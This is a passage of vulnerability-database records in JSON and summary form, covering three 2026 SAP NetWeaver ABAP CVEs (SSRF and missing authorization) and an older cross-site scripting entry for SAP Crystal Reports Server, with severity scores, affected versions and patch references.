                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-918",
                  "description": "CWE-918: Server-Side Request Forgery",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:17:51.285Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3689080"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Server-Side Request Forgery (SSRF) in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-24316",
        "datePublished": "2026-03-10T00:17:51.285Z",
        "dateReserved": "2026-01-21T22:15:25.361Z",
        "dateUpdated": "2026-03-10T16:53:14.123Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24310 (GCVE-0-2026-24310)

    Vulnerability from cvelistv5 – Published: 2026-03-10 00:17 – Updated: 2026-03-10 16:53
    VLAI
    Title
    Missing Authorization check in SAP NetWeaver Application Server for ABAP
    Summary
    Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module and read the sensitive information from database catalog of the ABAP system. This vulnerability has low impact on the application's confidentiality with no effect on the integrity and availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24310",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T15:36:11.428943Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-10T16:53:32.884Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module and read the sensitive information from database catalog of the ABAP system. This vulnerability has low impact on the application\u0027s confidentiality with no effect on the integrity and availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module and read the sensitive information from database catalog of the ABAP system. This vulnerability has low impact on the application\u0027s confidentiality with no effect on the integrity and availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "baseSeverity": "LOW",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862: Missing Authorization",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:17:21.077Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3694383"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization check in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-24310",
        "datePublished": "2026-03-10T00:17:21.077Z",
        "dateReserved": "2026-01-21T22:15:25.360Z",
        "dateUpdated": "2026-03-10T16:53:32.884Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24309 (GCVE-0-2026-24309)

    Vulnerability from cvelistv5 – Published: 2026-03-10 00:17 – Updated: 2026-03-10 16:53
    VLAI
    Title
    Missing Authorization check in SAP NetWeaver Application Server for ABAP
    Summary
    Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module to read, modify or insert entries into the database configuration table of the ABAP system. This unauthorized content change could lead to reduced system performance or interruptions. The vulnerability has low impact on the application's integrity and availability, with no effect on confidentiality.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24309",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T15:36:13.443096Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-10T16:53:39.013Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module to read, modify or insert entries into the database configuration table of the ABAP system. This unauthorized content change could lead to reduced system performance or interruptions. The vulnerability has low impact on the application\u0027s integrity and availability, with no effect on confidentiality.\u003c/p\u003e"
                }
              ],
              "value": "Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module to read, modify or insert entries into the database configuration table of the ABAP system. This unauthorized content change could lead to reduced system performance or interruptions. The vulnerability has low impact on the application\u0027s integrity and availability, with no effect on confidentiality."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "LOW",
                "baseScore": 6.4,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862: Missing Authorization",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:17:12.592Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3703856"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization check in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-24309",
        "datePublished": "2026-03-10T00:17:12.592Z",
        "dateReserved": "2026-01-21T22:15:25.360Z",
        "dateUpdated": "2026-03-10T16:53:39.013Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    VAR-201103-0371

    Vulnerability from variot - Updated: 2026-04-11 00:02

    SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "crystal reports server",
            "scope": "eq",
            "trust": 7.2,
            "vendor": "sap",
            "version": "2008"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084"
          }
        ]
      },
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "d2473478-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "IVD",
                "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "d2473478-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              },
              {
                "author": "IVD",
                "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \\\"url\\\", \\\"sWindow\\\", \\\"BEGIN_DATE\\\", \\\"END_DATE\\\", \\\"CURRENT_DATE\\\" and \\\"CURRENT_SLICE\\\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084"
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d"
          }
        ],
        "trust": 6.48
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "BID",
            "id": "46855",
            "trust": 5.4
          },
          {
            "db": "SECUNIA",
            "id": "43723",
            "trust": 5.4
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "D10C1F4C-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "CFB685EC-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "D2473478-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "DCC32308-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "DB50DDD0-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "D3FBF61E-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "D5A6C462-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "DFB80812-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "D8810BA2-1F9B-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084"
          }
        ]
      },
      "id": "VAR-201103-0371",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084"
          }
        ],
        "trust": 7.56469534
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 7.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084"
          }
        ]
      },
      "last_update_date": "2026-04-11T00:02:24.048000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Patch for SAP Crystal Reports Server \\\"analyticToken\\\" parameter vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3290"
          },
          {
            "title": "Patch for SAP Crystal Reports Server \\\"backURL\\\" parameter vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3283"
          },
          {
            "title": "Patch for SAP Crystal Reports Server Parameter Input Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3292"
          },
          {
            "title": "Patch for SAP Crystal Reports Server \\\"Sel\\\" parameter vulnerability",
            "trust": 0.6,
